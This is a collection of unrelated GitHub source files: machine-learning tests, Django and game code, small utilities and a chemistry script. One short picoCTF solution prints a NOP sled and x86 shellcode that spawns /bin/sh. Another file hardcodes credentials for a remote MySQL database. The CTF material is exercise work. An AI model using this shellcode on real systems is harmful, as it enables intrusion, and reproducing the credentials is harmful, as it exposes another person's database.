X_train, y_train = X[:tr_size, :], y[:tr_size]
X_test, y_test = X[tr_size:, :], y[tr_size:]
# First with cpu_predictor
params = {'tree_method': 'gpu_hist',
'predictor': 'cpu_predictor',
'n_jobs': -1,
'seed': 123}
m = xgb.XGBRegressor(**params).fit(X_train, y_train)
cpu_train_score = m.score(X_train, y_train)
cpu_test_score = m.score(X_test, y_test)
# Now with gpu_predictor
params['predictor'] = 'gpu_predictor'
m = xgb.XGBRegressor(**params).fit(X_train, y_train)
gpu_train_score = m.score(X_train, y_train)
gpu_test_score = m.score(X_test, y_test)
assert np.allclose(cpu_train_score, gpu_train_score)
assert np.allclose(cpu_test_score, gpu_test_score)
@pytest.mark.skipif(**tm.no_cupy())
def test_inplace_predict_cupy(self):
import cupy as cp
cp.cuda.runtime.setDevice(0)
rows = 1000
cols = 10
cp_rng = cp.random.RandomState(1994)
cp.random.set_random_state(cp_rng)
X = cp.random.randn(rows, cols)
y = cp.random.randn(rows)
dtrain = xgb.DMatrix(X, y)
booster = xgb.train({'tree_method': 'gpu_hist'},
dtrain, num_boost_round=10)
test = xgb.DMatrix(X[:10, ...])
predt_from_array = booster.inplace_predict(X[:10, ...])
predt_from_dmatrix = booster.predict(test)
cp.testing.assert_allclose(predt_from_array, predt_from_dmatrix)
def predict_dense(x):
inplace_predt = booster.inplace_predict(x)
d = xgb.DMatrix(x)
copied_predt = cp.array(booster.predict(d))
return cp.all(copied_predt == inplace_predt)
for i in range(10):
run_threaded_predict(X, rows, predict_dense)
@pytest.mark.skipif(**tm.no_cudf())
def test_inplace_predict_cudf(self):
import cupy as cp
import cudf
import pandas as pd
rows = 1000
cols = 10
rng = np.random.RandomState(1994)
cp.cuda.runtime.setDevice(0)
X = rng.randn(rows, cols)
X = pd.DataFrame(X)
y = rng.randn(rows)
X = cudf.from_pandas(X)
dtrain = xgb.DMatrix(X, y)
booster = xgb.train({'tree_method': 'gpu_hist'},
dtrain, num_boost_round=10)
test = xgb.DMatrix(X)
predt_from_array = booster.inplace_predict(X)
predt_from_dmatrix = booster.predict(test)
cp.testing.assert_allclose(predt_from_array, predt_from_dmatrix)
def predict_df(x):
inplace_predt = booster.inplace_predict(x)
d = xgb.DMatrix(x)
copied_predt = cp.array(booster.predict(d))
return cp.all(copied_predt == inplace_predt)
for i in range(10):
run_threaded_predict(X, rows, predict_df)
|
[
"noreply@github.com"
] |
Gerbuz.noreply@github.com
|
15dc87f1cf93f9b2f6112e12584d8b2874f44525
|
b35923f3170cc765ae1c77df432ca653e7c574cb
|
/accounts/views.py
|
5ee44c124dc5e9345924c53c83e6a205825e77dc
|
[] |
no_license
|
sudoshweta/My_JIRA
|
a3fa9b643029dfa3a3b43e617fb3178f75b96160
|
e46f7f44991d4b4dfc946235b924374c3b78bab0
|
refs/heads/master
| 2020-03-22T11:27:40.127857
| 2018-07-05T10:38:59
| 2018-07-05T10:38:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 778
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.views import generic
from django.views.generic import View
from .forms import SignupForm
def index(request):
return render(request, 'a.html')
#def signup(request):
# return render(request, 'signup.html')
def login(request):
return render(request, 'login.html')
class UserFormView(View):
form_class =SignupForm
template_name = 'signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form':form})
def poet(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.save()
|
[
"shwetasingh426060@gmail.com"
] |
shwetasingh426060@gmail.com
|
7ed2fecba76172cf4c9db655e2067ce08f16c25f
|
2ec7219f07b1c2b761c76ed0eae8108cc0ebb5cb
|
/experiments/scripts/setup_integrate_3d.py
|
318faf5a9fb6ac0121ea403ef9ad6ddf14b067e7
|
[] |
no_license
|
samueljmcameron/ABPs_coarse_graining
|
f4eac2c0810f516917e80dfd0d732dd2f1d7a6dc
|
68face0c92b3b76be29767f261e52e2b5509922d
|
refs/heads/master
| 2020-09-10T15:10:51.029675
| 2020-05-22T08:09:30
| 2020-05-22T08:09:30
| 221,733,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 521
|
py
|
from setuptools import setup
import numpy
from Cython.Build import cythonize
setup(
name='Integrate in 3d',
ext_modules = cythonize('integrate_3d.pyx',annotate=True,
compiler_directives={'boundscheck' : False,
'wraparound' : False,
'nonecheck' : False,
'cdivision' : True}),
include_dirs=[numpy.get_include()],
zip_safe=False,
)
|
[
"samuel.j.m.cameron@gmail.com"
] |
samuel.j.m.cameron@gmail.com
|
860d4185936f17a997095a651d33d38e5a18ebbf
|
522e755b313fe52320765f5ab45a8bbe2b3c0420
|
/pondus_download.py
|
c582f77189f474671872525212bfe755c8bc593e
|
[] |
no_license
|
danieman/pondusdl
|
b6547290cf1bd06a6cfc0177e2573f657b9e911c
|
842bf5a0ea40be9c7f45b999b85a5c9e4e410625
|
refs/heads/main
| 2023-06-21T03:00:51.363094
| 2021-07-14T22:02:46
| 2021-07-14T22:02:46
| 386,082,240
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,216
|
py
|
import requests
from bs4 import BeautifulSoup
from datetime import datetime
from pathlib import Path
from urllib.request import urlretrieve
WEBPAGE = "https://www.adressa.no/kultur/tegneserier/pondus/"
DIRECTORY = Path.home() / "pondus"
def find_images(url):
"""Takes a web page URL as input, and returns a list of relevant image URLs."""
r = requests.get(url)
soup = BeautifulSoup(r.text, "html.parser")
img_tags = soup.find_all("img")
image_urls = [img["src"] for img in img_tags]
return image_urls
def download_image(url, filename):
"""Downloads image and prints a confirmation to stdout."""
urlretrieve(url, filename)
time_str = datetime.now().strftime("[%Y-%m-%d %H:%M]")
print(f"{time_str} Downloaded {filename}!")
if __name__ == "__main__":
images = find_images(WEBPAGE)
# Create ./striper/ if necessary
if not (DIRECTORY / "striper").is_dir():
Path.mkdir(DIRECTORY / "striper")
# Download all new images to ./striper/
for image in images:
filename = DIRECTORY / "striper" / f"{image.split('/')[-1]}"
if not Path.is_file(filename) and "_pon_" in str(filename):
download_image(image, str(filename))
|
[
"hellnope1337@definitelynope.no"
] |
hellnope1337@definitelynope.no
|
db27e58936ee029169bd1e6839f1c07c7b26a7c3
|
574164eb23ab712054261aee57a48fa46f3a888b
|
/toontown/coghq/CountryClubLayout.py
|
b03d854750c8df1ffe2b11b2d49e88de61d0b960
|
[] |
no_license
|
CrankySupertoonArchive/toontownhardmode
|
210256bc1a3a889a3b2d6eb6d030b224e3cbbbda
|
fcee8926a10f36b8a4373fcbb518b18fad2aaeec
|
refs/heads/master
| 2021-06-15T07:41:47.761067
| 2017-03-19T17:27:53
| 2017-03-19T17:27:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,001
|
py
|
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import invertDictLossless
from toontown.coghq import CountryClubRoomSpecs
from toontown.toonbase import ToontownGlobals
from direct.showbase.PythonUtil import normalDistrib, lerp
import random
def printAllBossbotInfo():
print 'roomId: roomName'
for roomId, roomName in CountryClubRoomSpecs.BossbotCountryClubRoomId2RoomName.items():
print '%s: %s' % (roomId, roomName)
print '\nroomId: numBattles'
for roomId, numBattles in CountryClubRoomSpecs.roomId2numBattles.items():
print '%s: %s' % (roomId, numBattles)
print '\ncountryClubId floor roomIds'
printCountryClubRoomIds()
print '\ncountryClubId floor numRooms'
printNumRooms()
print '\ncountryClubId floor numForcedBattles'
printNumBattles()
def iterateBossbotCountryClubs(func):
from toontown.toonbase import ToontownGlobals
for countryClubId in [ToontownGlobals.BossbotCountryClubIntA, ToontownGlobals.BossbotCountryClubIntB, ToontownGlobals.BossbotCountryClubIntC]:
for floorNum in xrange(ToontownGlobals.CountryClubNumFloors[countryClubId]):
func(CountryClubLayout(countryClubId, floorNum))
def printCountryClubInfo():
def func(ml):
print ml
iterateBossbotCountryClubs(func)
def printCountryClubRoomIds():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getRoomIds()
iterateBossbotCountryClubs(func)
def printCountryClubRoomNames():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getRoomNames()
iterateBossbotCountryClubs(func)
def printNumRooms():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getNumRooms()
iterateBossbotCountryClubs(func)
def printNumBattles():
def func(ml):
print ml.getCountryClubId(), ml.getFloorNum(), ml.getNumBattles()
iterateBossbotCountryClubs(func)
ClubLayout2_0 = [(0, 2, 5, 9, 17), (0, 2, 5, 9, 18)]
ClubLayout2_1 = [(0, 2, 5, 9, 17), (0, 2, 5, 9, 18)]
ClubLayout2_2 = [(0, 2, 6, 9, 17), (0, 2, 6, 9, 18)]
ClubLayout4_0 = [(0, 22, 5, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 5, 29, 18)]
ClubLayout4_1 = [(0, 22, 6, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 4, 29, 17),
(0, 22, 6, 29, 18)]
ClubLayout4_2 = [(0, 22, 6, 29, 17),
(0, 22, 5, 29, 17),
(0, 22, 6, 29, 17),
(0, 22, 7, 29, 18)]
ClubLayout6_0 = [(0, 32, 5, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 7, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 7, 39, 18)]
ClubLayout6_1 = [(0, 32, 5, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 7, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 7, 39, 18)]
ClubLayout6_2 = [(0, 32, 6, 39, 17),
(0, 32, 7, 39, 17),
(0, 32, 6, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 5, 39, 17),
(0, 32, 7, 39, 18)]
countryClubLayouts = [ClubLayout2_0,
ClubLayout2_1,
ClubLayout2_2,
ClubLayout4_0,
ClubLayout4_1,
ClubLayout4_2,
ClubLayout6_0,
ClubLayout6_1,
ClubLayout6_2]
testLayout = [ClubLayout2_0,
ClubLayout2_0,
ClubLayout2_0,
ClubLayout4_0,
ClubLayout4_0,
ClubLayout4_0,
ClubLayout6_0,
ClubLayout6_0,
ClubLayout6_0]
countryClubLayouts = testLayout
class CountryClubLayout:
notify = DirectNotifyGlobal.directNotify.newCategory('CountryClubLayout')
def __init__(self, countryClubId, floorNum, layoutIndex):
self.countryClubId = countryClubId
self.floorNum = floorNum
self.layoutIndex = layoutIndex
self.roomIds = []
self.hallways = []
self.numRooms = 1 + ToontownGlobals.CountryClubNumRooms[self.countryClubId][0]
self.numHallways = self.numRooms - 1 + 1
self.roomIds = countryClubLayouts[layoutIndex][floorNum]
hallwayRng = self.getRng()
connectorRoomNames = CountryClubRoomSpecs.BossbotCountryClubConnectorRooms
for i in xrange(self.numHallways):
self.hallways.append(hallwayRng.choice(connectorRoomNames))
def _genFloorLayout(self):
rng = self.getRng()
startingRoomIDs = CountryClubRoomSpecs.BossbotCountryClubEntranceIDs
middleRoomIDs = CountryClubRoomSpecs.BossbotCountryClubMiddleRoomIDs
finalRoomIDs = CountryClubRoomSpecs.BossbotCountryClubFinalRoomIDs
numBattlesLeft = ToontownGlobals.CountryClubNumBattles[self.countryClubId]
finalRoomId = rng.choice(finalRoomIDs)
numBattlesLeft -= CountryClubRoomSpecs.getNumBattles(finalRoomId)
middleRoomIds = []
middleRoomsLeft = self.numRooms - 2
numBattles2middleRoomIds = invertDictLossless(CountryClubRoomSpecs.middleRoomId2numBattles)
allBattleRooms = []
for num, roomIds in numBattles2middleRoomIds.items():
if num > 0:
allBattleRooms.extend(roomIds)
while 1:
allBattleRoomIds = list(allBattleRooms)
rng.shuffle(allBattleRoomIds)
battleRoomIds = self._chooseBattleRooms(numBattlesLeft,
allBattleRoomIds)
if battleRoomIds is not None:
break
CountryClubLayout.notify.info('could not find a valid set of battle rooms, trying again')
middleRoomIds.extend(battleRoomIds)
middleRoomsLeft -= len(battleRoomIds)
if middleRoomsLeft > 0:
actionRoomIds = numBattles2middleRoomIds[0]
for i in xrange(middleRoomsLeft):
roomId = rng.choice(actionRoomIds)
actionRoomIds.remove(roomId)
middleRoomIds.append(roomId)
roomIds = []
roomIds.append(rng.choice(startingRoomIDs))
middleRoomIds.sort()
print 'middleRoomIds=%s' % middleRoomIds
roomIds.extend(middleRoomIds)
roomIds.append(finalRoomId)
return roomIds
def getNumRooms(self):
return len(self.roomIds)
def getRoomId(self, n):
return self.roomIds[n]
def getRoomIds(self):
return self.roomIds[:]
def getRoomNames(self):
names = []
for roomId in self.roomIds:
names.append(CountryClubRoomSpecs.BossbotCountryClubRoomId2RoomName[roomId])
return names
def getNumHallways(self):
return len(self.hallways)
def getHallwayModel(self, n):
return self.hallways[n]
def getNumBattles(self):
numBattles = 0
for roomId in self.getRoomIds():
numBattles += CountryClubRoomSpecs.roomId2numBattles[roomId]
return numBattles
def getCountryClubId(self):
return self.countryClubId
def getFloorNum(self):
return self.floorNum
def getRng(self):
return random.Random(self.countryClubId * self.floorNum)
def _chooseBattleRooms(self, numBattlesLeft, allBattleRoomIds, baseIndex = 0, chosenBattleRooms = None):
if chosenBattleRooms is None:
chosenBattleRooms = []
while baseIndex < len(allBattleRoomIds):
nextRoomId = allBattleRoomIds[baseIndex]
baseIndex += 1
newNumBattlesLeft = numBattlesLeft - CountryClubRoomSpecs.middleRoomId2numBattles[nextRoomId]
if newNumBattlesLeft < 0:
continue
elif newNumBattlesLeft == 0:
chosenBattleRooms.append(nextRoomId)
return chosenBattleRooms
chosenBattleRooms.append(nextRoomId)
result = self._chooseBattleRooms(newNumBattlesLeft, allBattleRoomIds, baseIndex, chosenBattleRooms)
if result is not None:
return result
else:
del chosenBattleRooms[-1:]
else:
return
return
def __str__(self):
return 'CountryClubLayout: id=%s, layoutIndex=%s, floor=%s, numRooms=%s, numBattles=%s' % (self.countryClubId,
self.layoutIndex,
self.floorNum,
self.getNumRooms(),
self.getNumBattles())
def __repr__(self):
return str(self)
|
[
"leotz58@gmail.com"
] |
leotz58@gmail.com
|
e57f3966a9d9a9ff011be89d95a3af59648e08d8
|
fc0eda8560a26c88b790d236070ed0559d0dc4a4
|
/leetcode/basicDS06_tree/b03_lc654_maximum_binary_tree.py
|
2e6bad124dcd6d0953d2e52293203245f5284c18
|
[] |
no_license
|
pankypan/DataStructureAndAlgo
|
b4bd417a16cdb594bbed2ca0220dbd63eb60f3c1
|
6c5d40d57d378994236549f8dea906c75121eadf
|
refs/heads/master
| 2021-08-03T01:22:08.442709
| 2021-07-19T14:56:44
| 2021-07-19T14:56:44
| 279,599,190
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,102
|
py
|
# https://leetcode-cn.com/problems/maximum-binary-tree/
from typing import List
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def __init__(self):
self.nums = list()
def get_max_index(self, start_i: int, end_i: int) -> int:
m_index, m_val = start_i, self.nums[start_i]
for i in range(start_i, end_i + 1):
if self.nums[i] > m_val:
m_val = self.nums[i]
m_index = i
return m_index
def constructMaximumBinaryTree(self, nums: List[int]) -> TreeNode:
self.nums = nums
return self.dfs(0, len(self.nums) - 1)
def dfs(self, start_i: int, end_i: int) -> TreeNode:
# base case
if start_i > end_i: return
# 找到最大值及其索引
m_index = self.get_max_index(start_i, end_i)
root = TreeNode(self.nums[m_index])
# 递归调用左右子树
root.left = self.dfs(start_i, m_index - 1)
root.right = self.dfs(m_index + 1, end_i)
return root
|
[
"1356523334@qq.com"
] |
1356523334@qq.com
|
7e337fa7519637972dcc9513bffb22bad84270b0
|
99aab5c2a40f8e146479dbd8778a2d52a8d4b8dc
|
/debug_ques_3.py
|
1fb58213603fae7f7fd851ce581f3768c5411853
|
[] |
no_license
|
poojasingh1995/MOREEXERCISE
|
2d76f12d7db432342590d652521214f5459711c0
|
a15aff39c47f6d6df695c553010ec02c2a4a2cca
|
refs/heads/main
| 2023-06-12T21:45:51.351342
| 2021-07-14T11:15:22
| 2021-07-14T11:15:22
| 385,912,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,833
|
py
|
def find_in_list(query, mainlist):
mainlist_len = len(mainlist)
range_for_loop = range(mainlist_len)
index = None
for i in range_for_loop:
element = mainlist[i]
if element == query:
index = i
return i
chars = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
shifted_chars = ['c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','a','b']
def encrypt_message(plain_msg):
encrypted_msg = ""
for character in plain_msg:
if character in chars:
char_index = find_in_list(character, chars)
new_char = shifted_chars[char_index]
encrypted_msg = encrypted_msg + new_char
else:
encrypted_msg = encrypted_msg + character
return encrypted_msg
def decrypt_message(encrypted_msg):
decrypted_msg = ""
for character in encrypted_msg:
if character in shifted_chars:
char_index = find_in_list(character, shifted_chars)
new_char = shifted_chars[char_index]
decrypted_msg = decrypted_msg + new_char
else:
decrypted_msg = decrypted_msg + character
return decrypted_msg
flag = True
while flag:
choice = input("What do you want to do? 1. Encrypt a message 2. Decrypt a message Enter `e` or `d` respectively!")
if choice == 'e':
plain_message = input("Enter message to encrypt??")
print(encrypt_message(plain_message))
elif choice == 'd':
encrypted_msg = input("Enter message to decrypt?")
print(decrypt_message(encrypted_msg))
play_again = input("Do you want to try agian or Do you want to exit? (Y/N)")
if play_again == 'Y':
continue
elif play_again == 'N':
break
|
[
"noreply@github.com"
] |
poojasingh1995.noreply@github.com
|
2573fbab9513ee871a79634eac860103fd0bb8ca
|
c90495e7698a799dc129f3ac7be3441df2a24a3d
|
/picoctf/picoctf2019/binary/slippery-shellcode/sh2.py
|
8f46ce7a84faaf060d3ef038c8e6f3b82947ecb7
|
[] |
no_license
|
xuan2261/ctf
|
1581fd46d0f1c2a0e12baf9e20b04fe3f5d29744
|
0dbce162c33263c73edf3114914abea2f30db37c
|
refs/heads/master
| 2022-12-04T02:50:46.559427
| 2020-08-28T07:38:58
| 2020-08-28T07:38:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 342
|
py
|
# save script in home directory /~
# run script from the slippery-shellcode directory
# python ~/p.py | ./vuln
NOP = "\x90" * 400
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
print NOP + shellcode
|
[
"classicunix@gmail.com"
] |
classicunix@gmail.com
|
3aa76ffd63db7e4119c43176ad09db9b1e17cf92
|
da7ba5573a9ad5e44f8efb0d7f00ab9295dbae13
|
/test2/movie/migrations/0004_auto_20190508_0711.py
|
8a3f46654af977161cc4e446f517c0b83d899011
|
[] |
no_license
|
wangxuanlin/linux111
|
6d60bd24a75a89d8d9d3d1ba74133e85f725b516
|
76e15d9446cc681059569b6b0a15b12b283b228b
|
refs/heads/master
| 2022-02-02T08:23:04.254504
| 2019-07-05T09:26:14
| 2019-07-05T09:26:14
| 177,509,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-05-08 07:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movie', '0003_auto_20190507_0849'),
]
operations = [
migrations.AlterField(
model_name='biaoqian',
name='biaoqian',
field=models.CharField(max_length=8, verbose_name='电影标签'),
),
]
|
[
"admin@wangxuanlin.local"
] |
admin@wangxuanlin.local
|
10cacc066be6617ba6ef42034c5bbce30fd7c0f6
|
02d1d89ed3c2a71a4f5a36f3a19f0683a0ae37e5
|
/gui/foo/foo/helpers.py
|
3ad33e658cdd47155da1a8571451f9b9f30a4ff1
|
[] |
no_license
|
lforet/robomow
|
49dbb0a1c873f75e11228e24878b1e977073118b
|
eca69d000dc77681a30734b073b2383c97ccc02e
|
refs/heads/master
| 2016-09-06T10:12:14.528565
| 2015-05-19T16:20:24
| 2015-05-19T16:20:24
| 820,388
| 11
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 918
|
py
|
# -*- coding: utf-8 -*-
### BEGIN LICENSE
# This file is in the public domain
### END LICENSE
"""Helpers for an Ubuntu application."""
__all__ = [
'make_window',
]
import os
import gtk
from foo.fooconfig import get_data_file
import gettext
from gettext import gettext as _
gettext.textdomain('foo')
def get_builder(builder_file_name):
"""Return a fully-instantiated gtk.Builder instance from specified ui
file
:param builder_file_name: The name of the builder file, without extension.
Assumed to be in the 'ui' directory under the data path.
"""
# Look for the ui file that describes the user interface.
ui_filename = get_data_file('ui', '%s.ui' % (builder_file_name,))
if not os.path.exists(ui_filename):
ui_filename = None
builder = gtk.Builder()
builder.set_translation_domain('foo')
builder.add_from_file(ui_filename)
return builder
|
[
"lforet@VMUb104nb32.(none)"
] |
lforet@VMUb104nb32.(none)
|
9e5bc8ea425225bd8fd3614d92049ac2d4ca9c84
|
2bc8d54ca2db5c3e292eac0bd3c55e2322aff1a2
|
/album.py
|
e76f3654aba253548da5d14cf0142c40a17744c8
|
[] |
no_license
|
SammyJoskey/Album_server_tort
|
d528955eaf578d40a719f2230c5dde19a031dba0
|
ad2a5b6afc8103c7976cee9659264860eec3483c
|
refs/heads/master
| 2020-09-11T11:01:52.994879
| 2019-11-16T03:49:11
| 2019-11-16T03:49:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,019
|
py
|
import sqlalchemy as sa
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
DB_PATH = "sqlite:///albums.sqlite3"
Base = declarative_base()
class Album(Base):
"""
Описывает структуру таблицы album для хранения записей музыкальной библиотеки
"""
__tablename__ = "album"
id = sa.Column(sa.INTEGER, primary_key=True)
year = sa.Column(sa.INTEGER)
artist = sa.Column(sa.TEXT)
genre = sa.Column(sa.TEXT)
album = sa.Column(sa.TEXT)
def connect_db():
"""
Устанавливает соединение к базе данных, создает таблицы, если их еще нет и возвращает объект сессии
"""
engine = sa.create_engine(DB_PATH)
Base.metadata.create_all(engine)
session = sessionmaker(engine)
return session()
def find(artist):
"""
Находит все альбомы в базе данных по заданному артисту
"""
session = connect_db()
albums = session.query(Album).filter(Album.artist == artist).all()
return albums
def find_album(artist, album):
"""
Проверяет в базе данных по заданному артисту заданный альбов
"""
session = connect_db()
album = session.query(Album).filter(Album.artist == artist).filter(Album.album == album).first()
return album
def is_number(a):
try:
int(a)
return int(a)
except ValueError:
return False
def album_add(year, artist, genre, album):
"""
принимает данные об альбоме, создает объект класса Album и добавляет его в базу
"""
session = connect_db()
NewAlbum = Album(year = year, artist = artist, genre = genre, album = album)
session.add(NewAlbum)
session.commit()
|
[
"noreply@github.com"
] |
SammyJoskey.noreply@github.com
|
d38891adee6974076d9d9ce77f2f863dc646f125
|
fe19d2fac4580d463132e61509bd6e3cc2cf958d
|
/direct/distributed/ParentMgr.pyc.py
|
ff07f655ba0d007a9501f9565880fc15a35116ed
|
[] |
no_license
|
t00nt0wn1dk/c0d3
|
3e6db6dd42c3aa36ad77709cf9016176a3f3a44f
|
7de105d7f3de0f8704b020e32fd063ee2fad8d0d
|
refs/heads/master
| 2021-01-01T16:00:15.367822
| 2015-03-21T21:25:52
| 2015-03-21T21:25:55
| 32,647,654
| 3
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,588
|
py
|
# 2013.08.22 22:14:09 Pacific Daylight Time
# Embedded file name: direct.distributed.ParentMgr
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import isDefaultValue
import types
class ParentMgr():
__module__ = __name__
notify = DirectNotifyGlobal.directNotify.newCategory('ParentMgr')
def __init__(self):
self.token2nodepath = {}
self.pendingParentToken2children = {}
self.pendingChild2parentToken = {}
def destroy(self):
del self.token2nodepath
del self.pendingParentToken2children
del self.pendingChild2parentToken
def privRemoveReparentRequest(self, child):
if child in self.pendingChild2parentToken:
self.notify.debug("cancelling pending reparent of %s to '%s'" % (repr(child), self.pendingChild2parentToken[child]))
parentToken = self.pendingChild2parentToken[child]
del self.pendingChild2parentToken[child]
self.pendingParentToken2children[parentToken].remove(child)
def requestReparent(self, child, parentToken):
if self.token2nodepath.has_key(parentToken):
self.privRemoveReparentRequest(child)
self.notify.debug("performing wrtReparent of %s to '%s'" % (repr(child), parentToken))
child.wrtReparentTo(self.token2nodepath[parentToken])
else:
if isDefaultValue(parentToken):
self.notify.error('child %s requested reparent to default-value token: %s' % (repr(child), parentToken))
self.notify.debug("child %s requested reparent to parent '%s' that is not (yet) registered" % (repr(child), parentToken))
self.privRemoveReparentRequest(child)
self.pendingChild2parentToken[child] = parentToken
self.pendingParentToken2children.setdefault(parentToken, [])
self.pendingParentToken2children[parentToken].append(child)
child.reparentTo(hidden)
def registerParent(self, token, parent):
if self.token2nodepath.has_key(token):
self.notify.error("registerParent: token '%s' already registered, referencing %s" % (token, repr(self.token2nodepath[token])))
if isDefaultValue(token):
self.notify.error('parent token (for %s) cannot be a default value (%s)' % (repr(parent), token))
if type(token) is types.IntType:
if token > 4294967295L:
self.notify.error('parent token %s (for %s) is out of uint32 range' % (token, repr(parent)))
self.notify.debug("registering %s as '%s'" % (repr(parent), token))
self.token2nodepath[token] = parent
if token in self.pendingParentToken2children:
children = self.pendingParentToken2children[token]
del self.pendingParentToken2children[token]
for child in children:
self.notify.debug("performing reparent of %s to '%s'" % (repr(child), token))
child.reparentTo(self.token2nodepath[token])
del self.pendingChild2parentToken[child]
def unregisterParent(self, token):
if not self.token2nodepath.has_key(token):
self.notify.warning("unregisterParent: unknown parent token '%s'" % token)
return
self.notify.debug("unregistering parent '%s'" % token)
del self.token2nodepath[token]
# okay decompyling C:\Users\Maverick\Documents\Visual Studio 2010\Projects\Unfreezer\py2\direct\distributed\ParentMgr.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2013.08.22 22:14:09 Pacific Daylight Time
|
[
"anonymoustoontown@gmail.com"
] |
anonymoustoontown@gmail.com
|
6d254711fd27acbd4b96f4a8d2a241f1d3f2a31a
|
b4f8c4789dfa9110d1d7907da5aefb7704d37f69
|
/q8.py
|
e39e16bba3a7f861f124aff01f98474b0fda114e
|
[] |
no_license
|
DeSales-Code-Jam-2020/code-jam2020-JordandEntremont
|
118cf52bb5987573e383d82543d2823acaff81c7
|
3c15a988b6a27a0c0ac7981711a4abb558e49c1d
|
refs/heads/master
| 2023-01-01T23:47:20.832394
| 2020-10-24T18:09:51
| 2020-10-24T18:09:51
| 306,923,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
def main(int1, int2, int3, int4, int5, int6, int7, int8):
return ""
if __name__ == "__main__":
print(
main(
# just trust me don't touch this - Jake Gadaleta
*map(lambda x: int(x), input("Input: ").strip().split(" "))
)
)
|
[
"66690702+github-classroom[bot]@users.noreply.github.com"
] |
66690702+github-classroom[bot]@users.noreply.github.com
|
ba6fe39e48cfdfebaca8e32ce5d1d8c059b308bd
|
2f254710e5e283c4d294609db30fd4e6e0df00da
|
/hw4_part1/locators.py
|
7ed882fe3190f61e8411c1e0469b395f222b2955
|
[] |
no_license
|
Silberlightning/stepik_test_automatization
|
58617b5e2d22b3fc101df92ee9f540da0577c61d
|
240154fcdad85c85de6b85bb0bb26dd696e27f95
|
refs/heads/master
| 2022-12-29T06:41:55.768392
| 2020-10-16T07:01:28
| 2020-10-16T07:01:28
| 296,555,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
link = "http://selenium1py.pythonanywhere.com"
search_input = "//input[@type='search']"
search_text ="tattoo"
button_search = "input.btn.btn-default"
button = "//button[@type='submit']"
|
[
"spogulit@gmail.com"
] |
spogulit@gmail.com
|
f7b6a2f605040d7e8a54563e526b8fb4116d6709
|
73898b07671733fed85149f4c4280972ac9a32e5
|
/reading_parameters.py
|
5f80a4b2540a71be911ccb1715e6597cd269b093
|
[] |
no_license
|
yhb8r4/iSpiEFP_Database_Search_Engine
|
bf94bd6db970e449c7fa7fcb1f935301f6007949
|
d702f420fa5833d012fc9a68af7ed3953f876132
|
refs/heads/master
| 2020-03-17T15:41:17.928658
| 2018-05-15T23:03:22
| 2018-05-15T23:03:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,831
|
py
|
# coding: utf-8
# In[3]:
import datetime
import sys
import mysql
import mysql.connector
db = mysql.connector.connect(host="ssi-db.cllylwkcavdc.us-east-2.rds.amazonaws.com",
user="lslipche",
passwd="29221627",
db="SSI_test")
cur = db.cursor()
# In[4]:
#check_data(cur)
#define all python functions to read in parameter file and extract information
def read_coord(file):
print(file)
"""
lines=[]
with open(file) as parameter:
for line in parameter:
if line.strip() == 'COORDINATES (BOHR)':
break
for line in parameter:
if line.strip() == 'STOP':
break
lines.append(line)
"""
with open(file) as parameter:
xyz=[]
for i in parameter:
parts = i.split()
if len(parts) == 4:
atoms = parts[0]
coord = parts[1:4]
new_coord = [coord for coord in list(map(float,coord))]
new_coord.insert(0,atoms)
xyz.append(new_coord)
return xyz
#gets coordinates in the xyz array
def get_coord(file):
xyz=read_coord(file)
new_array=[]
for i in xyz:
new_array.append(i)
for line in new_array:
if "O" in line[0]:
new_array[new_array.index(line)][0] = "O"
if "C" in line[0]:
new_array[new_array.index(line)][0] = "C"
if "H" in line[0]:
new_array[new_array.index(line)][0] = "H"
if "N" in line[0]:
new_array[new_array.index(line)][0] = "N"
